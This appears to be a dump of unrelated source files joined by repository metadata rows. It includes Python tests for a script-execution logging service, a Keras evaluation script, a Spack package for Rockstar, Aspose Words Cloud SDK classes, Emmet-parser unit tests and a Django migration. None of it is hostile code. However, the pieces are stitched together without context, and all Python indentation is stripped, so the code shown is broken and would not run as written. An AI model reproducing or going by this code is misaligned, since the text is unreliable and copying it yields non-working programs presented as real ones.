self.output_logger = self.create_logger()
self.output_stream.push('some text')
self.assertIsNone(self.read_log())
def test_caret_return(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.output_stream.push('some text\r')
self.output_stream.push('another text')
self.output_stream.close()
self.assertEqual(self.read_log(), 'some text\ranother text')
def create_logger(self):
self.file_path = os.path.join(test_utils.temp_folder, 'TestScriptOutputLogging.log')
self.logger = ScriptOutputLogger(self.file_path, self.output_stream)
return self.logger
def read_log(self):
if self.file_path and os.path.exists(self.file_path):
return file_utils.read_file(self.file_path, keep_newlines=True)
return None
def is_file_opened(self):
if self.output_logger.log_file:
return not self.output_logger.log_file.closed
return False
def setUp(self):
self.output_stream = Observable()
test_utils.setup()
super().setUp()
def tearDown(self):
self.output_stream.close()
self.output_logger._close()
test_utils.cleanup()
super().tearDown()
def _replace_line_separators(files, original, new):
for file in files:
content = file_utils.read_file(file, byte_content=True)
replaced_content = content.decode('utf-8').replace(original, new).encode('utf-8')
file_utils.write_file(file, replaced_content, byte_content=True)
class TestLoggingService(unittest.TestCase):
def test_no_history_entries(self):
entries = self.logging_service.get_history_entries()
self.assertEqual(0, len(entries))
def test_when_write_log_then_log_file_created(self):
self.simulate_logging()
log_files = self.get_log_files()
self.assertEqual(1, len(log_files))
def test_when_write_log_then_file_content_correct(self):
self.simulate_logging(log_lines=['line 1', 'some text'])
log_file = self.get_log_files()[0]
log_content = self.read_logs_only(log_file)
self.assertEqual('line 1\nsome text\n', log_content)
def test_write_log_with_caret_return(self):
self.simulate_logging(log_lines=['line 1\r', 'some text\r'])
log_file = self.get_log_files()[0]
log_content = self.read_logs_only(log_file)
self.assertEqual('line 1\r\nsome text\r\n', log_content)
def test_when_different_users_then_independent_files(self):
self.simulate_logging(user_name='user1', log_lines=['text for user1'])
self.simulate_logging(user_name='user2', log_lines=['user2 message'])
user1_log_file = self.get_log_files('user1')[0]
self.assertEqual('text for user1\n', self.read_logs_only(user1_log_file))
user2_log_file = self.get_log_files('user2')[0]
self.assertEqual('user2 message\n', self.read_logs_only(user2_log_file))
def test_get_history_entries_when_one(self):
start_time = get_current_millis()
self.simulate_logging(execution_id='id1',
user_name='user1',
script_name='My script',
log_lines=['some text'],
start_time_millis=start_time,
command='./script.sh -p p1 --flag')
entries = self.logging_service.get_history_entries()
self.assertEqual(1, len(entries))
entry = entries[0]
self.validate_history_entry(entry,
id='id1',
user_name='user1',
script_name='My script',
start_time=start_time,
command='./script.sh -p p1 --flag')
def test_no_history_for_wrong_file(self):
log_path = os.path.join(test_utils.temp_folder, 'wrong.log')
file_utils.write_file(log_path, 'log\ntext\n')
logs = self.logging_service.get_history_entries()
self.assertEqual(0, len(logs))
def test_multiline_command_in_history(self):
self.simulate_logging(execution_id='id1', command='./script.sh -p a\nb -p2 "\n\n\n"')
entries = self.logging_service.get_history_entries()
self.assertEqual(1, len(entries))
entry = entries[0]
self.validate_history_entry(entry, id='id1', command='./script.sh -p a\nb -p2 "\n\n\n"')
def test_get_log_by_id(self):
self.simulate_logging(execution_id='id_X', log_lines=['line1', '2', '', 'END'])
log = self.logging_service.find_log('id_X')
self.assertEqual('line1\n2\n\nEND\n', log)
def test_get_log_by_wrong_id(self):
self.simulate_logging(execution_id='1', log_lines=['text'])
log = self.logging_service.find_log('2')
self.assertIsNone(log)
def test_exit_code_in_history(self):
self.exit_codes['1'] = 13
self.simulate_logging(execution_id='1', log_lines=['text'])
entry = self.logging_service.get_history_entries()[0]
self.validate_history_entry(entry, id='1', exit_code=13)
def test_history_entries_after_restart(self):
self.simulate_logging(execution_id='id1')
new_service = ExecutionLoggingService(test_utils.temp_folder, LogNameCreator())
entry = new_service.get_history_entries()[0]
self.validate_history_entry(entry, id='id1')
def test_get_history_entries_after_delete(self):
self.simulate_logging(execution_id='id1')
for file in os.listdir(test_utils.temp_folder):
os.remove(os.path.join(test_utils.temp_folder, file))
entries = self.logging_service.get_history_entries()
self.assertCountEqual([], entries)
def test_find_history_entry_after_delete(self):
self.simulate_logging(execution_id='id1')
for file in os.listdir(test_utils.temp_folder):
os.remove(os.path.join(test_utils.temp_folder, file))
entry = self.logging_service.find_history_entry('id1')
self.assertIsNone(entry)
def test_find_history_entry(self):
self.simulate_logging(execution_id='id1')
entry = self.logging_service.find_history_entry('id1')
self.assertIsNotNone(entry)
self.validate_history_entry(entry, id='id1')
def test_not_find_history_entry(self):
self.simulate_logging(execution_id='id1')
entry = self.logging_service.find_history_entry('id2')
self.assertIsNone(entry)
def test_find_history_entry_after_restart(self):
self.simulate_logging(execution_id='id1')
new_service = ExecutionLoggingService(test_utils.temp_folder, LogNameCreator())
entry = new_service.find_history_entry('id1')
self.assertIsNotNone(entry)
self.validate_history_entry(entry, id='id1')
def test_entry_time_when_timezone(self):
start_time_with_tz = datetime.strptime('2018-04-03T18:25:22+0230', "%Y-%m-%dT%H:%M:%S%z")
self.simulate_logging(execution_id='id1', start_time_millis=to_millis(start_time_with_tz))
entry = self.logging_service.find_history_entry('id1')
self.assertEqual(entry.start_time, start_time_with_tz)
self.assertEqual(entry.start_time.utcoffset(), timedelta(hours=0, minutes=0))
def test_entry_with_user_id_name_different(self):
self.simulate_logging(execution_id='id1', user_name='userX', user_id='192.168.2.12')
entry = self.logging_service.find_history_entry('id1')
self.validate_history_entry(entry, id='id1', user_name='userX', user_id='192.168.2.12')
def test_find_entry_when_windows_line_seperator(self):
self.simulate_logging(execution_id='id1', user_name='userX', user_id='192.168.2.12')
_replace_line_separators(self.get_log_files(), '\n', '\r\n')
entry = self.logging_service.find_history_entry('id1')
self.validate_history_entry(entry, id='id1', user_name='userX', user_id='192.168.2.12')
def test_find_log_when_windows_line_seperator(self):
self.simulate_logging(execution_id='id1', log_lines=['hello', 'wonderful', 'world'])
_replace_line_separators(self.get_log_files(), '\n', '\r\n')
log = self.logging_service.find_log('id1')
self.assertEqual('hello\r\nwonderful\r\nworld\r\n', log)
def validate_history_entry(self, entry, *,
id,
user_name='userX',
user_id=None,
script_name='my_script',
start_time='IGNORE',
command='cmd',
exit_code=0):
if user_id is None:
user_id = user_name
self.assertEqual(id, entry.id)
self.assertEqual(user_name, entry.user_name)
self.assertEqual(user_id, entry.user_id)
self.assertEqual(script_name, entry.script_name)
self.assertEqual(command, entry.command)
if start_time != 'IGNORE':
self.assertEqual(ms_to_datetime(start_time), entry.start_time)
self.assertEqual(exit_code, entry.exit_code)
def read_logs_only(self, log_file):
content = file_utils.read_file(log_file, keep_newlines=True)
self.assertTrue(OUTPUT_STARTED_MARKER in content)
log_start = content.index(OUTPUT_STARTED_MARKER) + len(OUTPUT_STARTED_MARKER) + 1
return content[log_start:]
def simulate_logging(self,
execution_id=None,
user_name='userX',
user_id=None,
script_name='my_script',
command='cmd',
log_lines=None,
start_time_millis=None):
if not execution_id:
execution_id = str(uuid.uuid1())
if user_id is None:
user_id = user_name
output_stream = Observable()
all_audit_names = {audit_utils.AUTH_USERNAME: user_id}
self.logging_service.start_logging(
execution_id,
user_name,
user_id,
script_name,
command,
output_stream,
self.post_info_provider,
all_audit_names,
start_time_millis)
if log_lines:
for line in log_lines:
output_stream.push(line + '\n')
output_stream.close()
@staticmethod
def get_log_files(pattern=None):
files = [os.path.join(test_utils.temp_folder, file)
for file in os.listdir(test_utils.temp_folder)
if file.lower().endswith('.log')]
if pattern:
files = [file for file in files
if pattern in os.path.basename(file)]
return files
def setUp(self):
test_utils.setup()
self.exit_codes = {}
self.post_info_provider = _MapBasedPostExecInfo(self.exit_codes)
self.logging_service = ExecutionLoggingService(test_utils.temp_folder, LogNameCreator())
def tearDown(self):
test_utils.cleanup()
class _MapBasedPostExecInfo(PostExecutionInfoProvider):
def __init__(self, exit_codes):
self.exit_codes = exit_codes
def get_exit_code(self, execution_id):
if execution_id in self.exit_codes:
return self.exit_codes[execution_id]
return 0
| 35.656676
| 99
| 0.647486
|
dda8e80eb203660b07ebb72b3a805c55d3ea3ac7
| 988
|
py
|
Python
|
Model.py
|
yash1996/Emotion-Recognition-by-Facial-features
|
bda21885244e9aac652445cf6349127783384220
|
[
"MIT"
] | 1
|
2018-12-08T10:55:09.000Z
|
2018-12-08T10:55:09.000Z
|
Model.py
|
yash1996/Emotion-Recognition-by-Facial-features
|
bda21885244e9aac652445cf6349127783384220
|
[
"MIT"
] | null | null | null |
Model.py
|
yash1996/Emotion-Recognition-by-Facial-features
|
bda21885244e9aac652445cf6349127783384220
|
[
"MIT"
] | null | null | null |
import keras
import os
from keras.models import model_from_json
import h5py
from keras.models import Sequential, Model
from keras.layers import Dense, LSTM, Activation, Input
from keras.optimizers import adam, rmsprop, adadelta
import numpy as np
from keras.utils import to_categorical
from keras.models import load_model
json_file = open('model.json','r')
x_test = h5py.File('x_val.hdf5','r')
y_test = h5py.File('y_val.hdf5','r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
model.load_weights("weights.hdf5")
print("Loaded model from disk")
print(list(x_test.keys()))
print(list(y_test.keys()))
x_test = x_test['x_val'][:]
y_test = y_test['y_val'][:]
y_test = to_categorical(y_test)
print(x_test[0],x_test[1])
print(y_test[0],y_test[1])
#a = model.get_config()
#print("model config is ",a)
model.compile(optimizer='rmsprop', loss='mse')
accuracy = model.evaluate(x_test,y_test)
print('accuracy',accuracy)
| 32.933333
| 56
| 0.742915
|
3f2a695a3b73ff35dcf4fbca9b1923480a560837
| 321
|
py
|
Python
|
exonum_precheck/__main__.py
|
popzxc/exonum_precheck
|
8a109f44333e9a0f5425fd1cf1796bb6705a3167
|
[
"MIT"
] | 1
|
2019-09-10T13:14:32.000Z
|
2019-09-10T13:14:32.000Z
|
exonum_precheck/__main__.py
|
popzxc/exonum_precheck
|
8a109f44333e9a0f5425fd1cf1796bb6705a3167
|
[
"MIT"
] | null | null | null |
exonum_precheck/__main__.py
|
popzxc/exonum_precheck
|
8a109f44333e9a0f5425fd1cf1796bb6705a3167
|
[
"MIT"
] | null | null | null |
import argparse
from exonum_precheck import run_check
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog="exonum_precheck", description="Exonum deployment precheck script")
parser.add_argument('--jobs', nargs='*', default=['unit-test', 'lints'])
args = parser.parse_args()
run_check(args)
| 32.1
| 109
| 0.728972
|
ebf47ab45dfdb750c1ecffb29d0acb2d0bec2259
| 1,422
|
py
|
Python
|
var/spack/repos/builtin/packages/rockstar/package.py
|
nkianggiss/spack
|
3477d3375142a30f5714bb5966a6d8bb22c33c06
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 3
|
2019-06-27T13:26:50.000Z
|
2019-07-01T16:24:54.000Z
|
var/spack/repos/builtin/packages/rockstar/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 75
|
2016-07-27T11:43:00.000Z
|
2020-12-08T15:56:53.000Z
|
var/spack/repos/builtin/packages/rockstar/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 8
|
2015-10-16T13:51:49.000Z
|
2021-10-18T13:58:03.000Z
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
class Rockstar(MakefilePackage):
"""The Rockstar Halo Finder"""
homepage = "https://bitbucket.org/gfcstanford/rockstar"
version('develop', git='https://bitbucket.org/gfcstanford/rockstar.git')
version('yt', hg='https://bitbucket.org/MatthewTurk/rockstar')
variant('hdf5', description='Build rockstar with HDF5 support', default=False)
patch('adjust_buildscript.patch')
depends_on('hdf5', when='+hdf5')
def build(self, spec, prefix):
# Set environment appropriately for HDF5
if '+hdf5' in spec:
os.environ['HDF5_INC_DIR'] = spec['hdf5'].prefix.include
os.environ['HDF5_LIB_DIR'] = spec['hdf5'].prefix.lib
# Build depending on whether hdf5 is to be used
if '+hdf5' in spec:
make('with_hdf5')
else:
make()
# Build rockstar library
make('lib')
def install(self, spec, prefix):
# Install all files and directories
install_tree('.', prefix)
mkdir(prefix.bin)
mkdir(prefix.lib)
install('rockstar', join_path(prefix.bin, 'rockstar'))
install('librockstar.so', join_path(prefix.lib, 'librockstar.so'))
| 29.625
| 82
| 0.647679
|
23ab4e5cf331c09b9454605f124656d3c58735d4
| 4,520
|
py
|
Python
|
azext_iot/sdk/dps/service/models/device_registration_state.py
|
jongio/azure-iot-cli-extension
|
5e41824688c4d9e4593737a55e8789a6bb1d2411
|
[
"MIT"
] | null | null | null |
azext_iot/sdk/dps/service/models/device_registration_state.py
|
jongio/azure-iot-cli-extension
|
5e41824688c4d9e4593737a55e8789a6bb1d2411
|
[
"MIT"
] | null | null | null |
azext_iot/sdk/dps/service/models/device_registration_state.py
|
jongio/azure-iot-cli-extension
|
5e41824688c4d9e4593737a55e8789a6bb1d2411
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DeviceRegistrationState(Model):
"""Device registration state.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar registration_id: This id is used to uniquely identify a device
registration of an enrollment.
A case-insensitive string (up to 128 characters long) of alphanumeric
characters plus certain special characters : . _ -. No special characters
allowed at start or end.
:vartype registration_id: str
:ivar created_date_time_utc: Registration create date time (in UTC).
:vartype created_date_time_utc: datetime
:ivar assigned_hub: Assigned Azure IoT Hub.
:vartype assigned_hub: str
:ivar device_id: Device ID.
:vartype device_id: str
:ivar status: Enrollment status. Possible values include: 'unassigned',
'assigning', 'assigned', 'failed', 'disabled'
:vartype status: str or ~dps.models.enum
:ivar substatus: Substatus for 'Assigned' devices. Possible values include
- 'initialAssignment': Device has been assigned to an IoT hub for the
first time, 'deviceDataMigrated': Device has been assigned to a different
IoT hub and its device data was migrated from the previously assigned IoT
hub. Device data was removed from the previously assigned IoT hub,
'deviceDataReset': Device has been assigned to a different IoT hub and
its device data was populated from the initial state stored in the
enrollment. Device data was removed from the previously assigned IoT hub,
'reprovisionedToInitialAssignment': Device has been re-provisioned to a
previously assigned IoT hub. Possible values include: 'initialAssignment',
'deviceDataMigrated', 'deviceDataReset',
'reprovisionedToInitialAssignment'
:vartype substatus: str or ~dps.models.enum
:ivar error_code: Error code.
:vartype error_code: int
:ivar error_message: Error message.
:vartype error_message: str
:ivar last_updated_date_time_utc: Last updated date time (in UTC).
:vartype last_updated_date_time_utc: datetime
:ivar etag: The entity tag associated with the resource.
:vartype etag: str
:ivar payload: Custom allocation payload returned from the webhook to the
device.
:vartype payload: object
"""
_validation = {
'registration_id': {'readonly': True},
'created_date_time_utc': {'readonly': True},
'assigned_hub': {'readonly': True},
'device_id': {'readonly': True},
'status': {'readonly': True},
'substatus': {'readonly': True},
'error_code': {'readonly': True},
'error_message': {'readonly': True},
'last_updated_date_time_utc': {'readonly': True},
'etag': {'readonly': True},
'payload': {'readonly': True},
}
_attribute_map = {
'registration_id': {'key': 'registrationId', 'type': 'str'},
'created_date_time_utc': {'key': 'createdDateTimeUtc', 'type': 'iso-8601'},
'assigned_hub': {'key': 'assignedHub', 'type': 'str'},
'device_id': {'key': 'deviceId', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'substatus': {'key': 'substatus', 'type': 'str'},
'error_code': {'key': 'errorCode', 'type': 'int'},
'error_message': {'key': 'errorMessage', 'type': 'str'},
'last_updated_date_time_utc': {'key': 'lastUpdatedDateTimeUtc', 'type': 'iso-8601'},
'etag': {'key': 'etag', 'type': 'str'},
'payload': {'key': 'payload', 'type': 'object'},
}
def __init__(self, **kwargs):
super(DeviceRegistrationState, self).__init__(**kwargs)
self.registration_id = None
self.created_date_time_utc = None
self.assigned_hub = None
self.device_id = None
self.status = None
self.substatus = None
self.error_code = None
self.error_message = None
self.last_updated_date_time_utc = None
self.etag = None
self.payload = None
| 43.883495
| 92
| 0.647345
|
efd89ab243bfd8d4c0da2f2cfebdcbc740e3927e
| 8,603
|
py
|
Python
|
test/test_emmetNode.py
|
Ariyn/crawling-script
|
0757e1fe71c66cac60331b630f927b8ab6114a97
|
[
"MIT"
] | null | null | null |
test/test_emmetNode.py
|
Ariyn/crawling-script
|
0757e1fe71c66cac60331b630f927b8ab6114a97
|
[
"MIT"
] | 7
|
2016-10-30T17:02:33.000Z
|
2018-12-08T18:40:33.000Z
|
test/test_emmetNode.py
|
Ariyn/crawling-script
|
0757e1fe71c66cac60331b630f927b8ab6114a97
|
[
"MIT"
] | null | null | null |
import unittest
import unittest.mock as mock
from unittest.mock import MagicMock, mock_open
import os
import logging
import src.EmmetNode as nsp
from src.Emmet import Emmet
from src.HTML import Element, MyHTMLParser
from src.tools import Log
class Tester(unittest.TestCase):
debug = False
scripts = [
"tag1> tag2",
"[ abc := def , ghi := jkl ]",
"{ abc := def , ghi := jkl }",
"tag1>ul>(li>span[nth-sibling:=2]{title:= body})+(li>span[nth-sibling:=2]{author:=body})",
"div>ul>(li[test:=1]>span)+(li[test:=2]>span)>sdf",
"div#test.test1.test2{map:=data-map, list:=data-list}",
"div#test>span{title:=body}",
"t1>(t2>t3>t4+t5)+(t3>t4+t5)",
"t1[attr-index:=0]>(t3>t4)+(t3>t4>t5)",
"article.Story--large.Story--stagger.p-2.Story>a>div>img.d-block{image:=src}"
]
html = [
"<div id='test'>"
]
elements = [Element("tag1"), Element("ul"), Element("li"), Element("span",[
("body","testTitle")
]),Element("li"), Element("span",[
("body","testAuthor")
])]
@staticmethod
def setUpClass():
format = "%(asctime)-15s %(message)s %(datas)s"
Log.format = format
Log.debug = Tester.debug
Tester.logger = Log()
Tester.log = Tester.logger.log
def setUp(self):
pass
# @unittest.skip("for test")
def test_condition_expression(self):
s = nsp.conditionExp.search(Tester.scripts[1])
if s:
s = [nsp.allocationExp.search(i.strip()) for i in s.group(1).split(",")]
s = [i.groups() if i else i for i in s]
Tester.log.info(msg="condition parse done", extra={"datas":str(s)})
# @unittest.skip("for test")
def test_capture_expression(self):
s = nsp.captureExp.search(Tester.scripts[2])
if s:
s = [nsp.allocationExp.search(i.strip()) for i in s.group(1).split(",")]
s = [i.groups() if i else i for i in s]
Tester.log.info(msg="capture parse done", extra={"datas":str(s)})
# @unittest.skip("for test")
def test_split_token(self):
nsp.splitToken(self.scripts[0])
# @unittest.skip("for test")
def test_complex_script_split_token(self):
nsp.splitToken(self.scripts[3])
# @unittest.skip("for test")
def test_complex_script_parse(self):
tokens = nsp.splitToken(self.scripts[3])
root = nsp.parse(tokens)
# @unittest.skip("for test")
def test_complex_script_plus_order(self):
tokens = nsp.splitToken(self.scripts[4])
root = nsp.parse(tokens)
div = root.children[0]
# print(div, div.condition, div.capture, div.raw)
root.travel()
# @unittest.skip("for test")
def test_emmet_node_match(self):
tokens = nsp.splitToken(self.scripts[5])
root = nsp.parse(tokens)
tag = root.travel()
# @unittest.skip("for test")
def test_check_emmet(self):
tokens = nsp.splitToken(self.scripts[5])
root = nsp.parse(tokens).children[0]
e = Element("div", [
("id","test"),
("class", "test1 test2"),
("data-map","NY"),
("data-list","p1,p2,p3")
])
self.assertTrue(root.match(e))
e2 = Element("div", [
("id","test2"),
("class", "test1 test2"),
("data-map","NY"),
("data-list","p1,p2,p3")
])
self.assertFalse(root.match(e2))
# if root.match(e):
# x = root.capture(e)
# print(x)
def test_newStyle_node_iteration(self):
e = Emmet(self.scripts[3])
back = False
strs = []
for i in e:
strs.append(i.tag)
if i.tag == "ul" and not back:
e.index -= 1
back = True
self.assertEqual(" ".join(strs), "tag1 ul ul li span li span")
@unittest.skip("for test")
def test_emmet_newStyle_check(self):
elements = [Element("tag1"), Element("ul"), Element("li"), Element("span",[
("body","testestset")
]),Element("li"), Element("span",[
("body","testestset")
])]
emmetEngine = Emmet(self.scripts[3])
for ele in elements:
x = emmetEngine.check(ele)
# if not x:
# print("element not passed", ele)
self.assertTrue(x)
@unittest.skip("for test")
def test_emmet_newStyle_check_right_elements(self):
e = self.elements
operation = [
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(e[4], False),
(e[5], False),
(e[5], True),
(e[4], True),
(e[1], True),
(e[0], True)
]
emmetEngine = Emmet(self.scripts[3])
for i in range(2):
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual({"title":"testTitle", "author":"testAuthor"}, emmetEngine.captures[0])
@unittest.skip("for test")
def test_emmet_newStyle_check_wrong_elements(self):
e = self.elements
wrongElement = Element("li2")
operation = [
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(wrongElement, False),
(e[5], False),
(e[5], True),
(wrongElement, True),
(e[1], True),
(e[0], True)
]
emmetEngine = Emmet(self.scripts[3])
for i in range(2):
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual([], emmetEngine.captures)
@unittest.skip("for test")
def test_emmet_newStyle_check_right_but_many_parent_elements(self):
e = self.elements
wrongElement = Element("li2")
operation = [
(wrongElement, False),
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(e[4], False),
(e[5], False),
(e[5], True),
(e[4], True),
(e[1], True),
(e[0], True),
(wrongElement, True)
]
emmetEngine = Emmet(self.scripts[3])
for i in range(2):
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual({"title":"testTitle", "author":"testAuthor"}, emmetEngine.captures[0])
@unittest.skip("for test")
def test_emmet_newStyle_check_right_but_wrong_siblings_elements(self):
# print("\ntest_emmet_newStyle_check_right_but_wrong_siblings_elements")
e = self.elements
wrongElement = Element("li2")
operation = [
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(wrongElement, False),
(wrongElement, True),
(e[4], False),
(e[5], False),
(e[5], True),
(e[4], True),
(e[1], True),
(e[0], True)
]
emmetEngine = Emmet(self.scripts[3])
indent = 0
for i in operation:
# print((" "*indent+"<%s>" if not i[1] else " "*(indent-1)+"</%s>")%i[0].tag)
if i[1]:
indent -= 1
else:
indent += 1
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual({"title":"testTitle", "author":"testAuthor"}, emmetEngine.captures[0])
@unittest.skip("for test")
def test_emmet_newStyle_check_just_wrong_elements(self):
# print("\ntest_emmet_newStyle_check_just_wrong_elements")
e = self.elements
wrongElement = Element("li2")
operation = [
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(e[4], False),
(e[5], False),
(wrongElement, False),
(wrongElement, True),
(e[5], True),
(e[4], True),
(e[1], True),
(e[0], True)
]
emmetEngine = Emmet(self.scripts[3])
indent = 0
for i in operation:
# print((" "*indent+"<%s>" if not i[1] else " "*(indent-1)+"</%s>")%i[0].tag)
if i[1]:
indent -= 1
else:
indent += 1
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual([], emmetEngine.captures)
@unittest.skip("test skip")
def test_tree_list_maker(self):
emmetEngine = Emmet(self.scripts[7])
self.assertTrue(4 in emmetEngine.treeDict)
@unittest.skip("test skip")
def test_traverse_tree(self):
emmetEngine = Emmet(self.scripts[7])
x = [emmetEngine.traverseTree().tag for i in range(8)]
self.assertEqual(",".join(x), "t1,t2,t3,t4,t5,t3,t4,t5")
@unittest.skip("test skip")
def test_traverse_possible_list(self):
emmetEngine = Emmet(self.scripts[7])
emmetEngine.traverseTree()
emmetEngine.traverseTree()
emmetEngine.traverseTree()
self.assertEqual(",".join([i.tag for i in emmetEngine.possibleList]), "t3,t4,t5")
@unittest.skip("test skip")
def test_check2(self):
emmetEngine = Emmet(self.scripts[8])
# print(emmetEngine.root.children)
tags = ["t1", "t2", "t3", "t4", "t5", "t3", "t4", "t5"]
e = [Element(t, attr=[("attr-index", index)]) for index, t in enumerate(tags)]
emmetEngine.check2open(e[0])
emmetEngine.check2open(e[2])
emmetEngine.check2open(e[3])
emmetEngine.check2open(e[4])
emmetEngine.check2close(e[4])
emmetEngine.check2close(e[3])
emmetEngine.check2close(e[2])
emmetEngine.check2open(e[5])
emmetEngine.check2open(e[6])
emmetEngine.check2close(e[6])
emmetEngine.check2close(e[5])
emmetEngine.check2close(e[0])
| 26.228659
| 92
| 0.63257
|
36c0ad45ad5311287ddf673915e86c817eb95c62
| 3,839
|
py
|
Python
|
asposewordscloud/models/requests/create_folder_request.py
|
aspose-words-cloud/aspose-words-cloud-python
|
65c7b55fa4aac69b60d41e7f54aed231df285479
|
[
"MIT"
] | 14
|
2018-07-15T17:01:52.000Z
|
2018-11-29T06:15:33.000Z
|
asposewordscloud/models/requests/create_folder_request.py
|
aspose-words-cloud/aspose-words-cloud-python
|
65c7b55fa4aac69b60d41e7f54aed231df285479
|
[
"MIT"
] | 1
|
2018-09-28T12:59:34.000Z
|
2019-10-08T08:42:59.000Z
|
asposewordscloud/models/requests/create_folder_request.py
|
aspose-words-cloud/aspose-words-cloud-python
|
65c7b55fa4aac69b60d41e7f54aed231df285479
|
[
"MIT"
] | 2
|
2020-12-21T07:59:17.000Z
|
2022-02-16T21:41:25.000Z
|
# coding: utf-8
# -----------------------------------------------------------------------------------
# <copyright company="Aspose" file="create_folder_request.py">
# Copyright (c) 2021 Aspose.Words for Cloud
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
import json
from six.moves.urllib.parse import quote
from asposewordscloud import *
from asposewordscloud.models import *
from asposewordscloud.models.requests import *
from asposewordscloud.models.responses import *
class CreateFolderRequest(BaseRequestObject):
"""
Request model for create_folder operation.
Initializes a new instance.
:param path Target folder's path e.g. Folder1/Folder2/. The folders will be created recursively.
:param storage_name Storage name.
"""
def __init__(self, path, storage_name=None):
self.path = path
self.storage_name = storage_name
def create_http_request(self, api_client):
# verify the required parameter 'path' is set
if self.path is None:
raise ValueError("Missing the required parameter `path` when calling `create_folder`") # noqa: E501
path = '/v4.0/words/storage/folder/{path}'
path_params = {}
if self.path is not None:
path_params['path'] = self.path # noqa: E501
else:
path_params['path'] = '' # noqa: E501
# path parameters
collection_formats = {}
if path_params:
path_params = api_client.sanitize_for_serialization(path_params)
path_params = api_client.parameters_to_tuples(path_params, collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
path = path.replace(
'{%s}' % k,
quote(str(v), safe=api_client.configuration.safe_chars_for_path_param)
)
# remove optional path parameters
path = path.replace('//', '/')
query_params = []
if self.storage_name is not None:
query_params.append(('storageName', self.storage_name)) # noqa: E501
header_params = {}
form_params = []
body_params = None
return {
"method": "PUT",
"path": path,
"query_params": query_params,
"header_params": header_params,
"form_params": form_params,
"body": body_params,
"collection_formats": collection_formats,
"response_type": 'None' # noqa: E501
}
def get_response_type(self):
return 'None' # noqa: E501
def deserialize_response(self, api_client, response):
return None
| 39.173469
| 112
| 0.633238
|
708ff3b4c8cf6bbf0a4af25f8bb414886fc3c3b5
| 657
|
py
|
Python
|
hkm/migrations/0025_userprofile_printer_presets.py
|
andersinno/kuvaselaamo
|
aed553a0ba85e82055e0de025ba2d3e3e4f2c9e6
|
[
"MIT"
] | 1
|
2017-05-07T10:46:24.000Z
|
2017-05-07T10:46:24.000Z
|
hkm/migrations/0025_userprofile_printer_presets.py
|
City-of-Helsinki/kuvaselaamo
|
3fa9b69e3f5496620852d8b138129d0069339fcd
|
[
"MIT"
] | 60
|
2016-10-18T11:18:48.000Z
|
2022-02-13T20:04:18.000Z
|
hkm/migrations/0025_userprofile_printer_presets.py
|
andersinno/kuvaselaamo
|
aed553a0ba85e82055e0de025ba2d3e3e4f2c9e6
|
[
"MIT"
] | 9
|
2017-04-18T13:26:26.000Z
|
2020-02-13T20:05:13.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-10-02 09:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hkm', '0024_hkm_museum_user'),
]
operations = [
migrations.AddField(
model_name='userprofile',
name='printer_presets',
field=models.TextField(default=b'{"api-poster-gloss-40x30": 0, "api-poster-gloss-A4-horizontal": 0, "api-poster-50x70": 0, "api-poster-gloss-A4": 0, "api-poster-70x50": 0, "api-poster-gloss-30x40": 0}', verbose_name='Tulostimen presetit'),
),
]
| 31.285714
| 251
| 0.643836
|
acb12afe42e431fc310cb2f395337f6c8b4adcdc
| 3,960
|
py
|
Python
|
test/utils.py
|
chandur626/TeachersPetBot
|
ad1fd36be5bd3690949d0e3a6e29c9100bf43e15
|
[
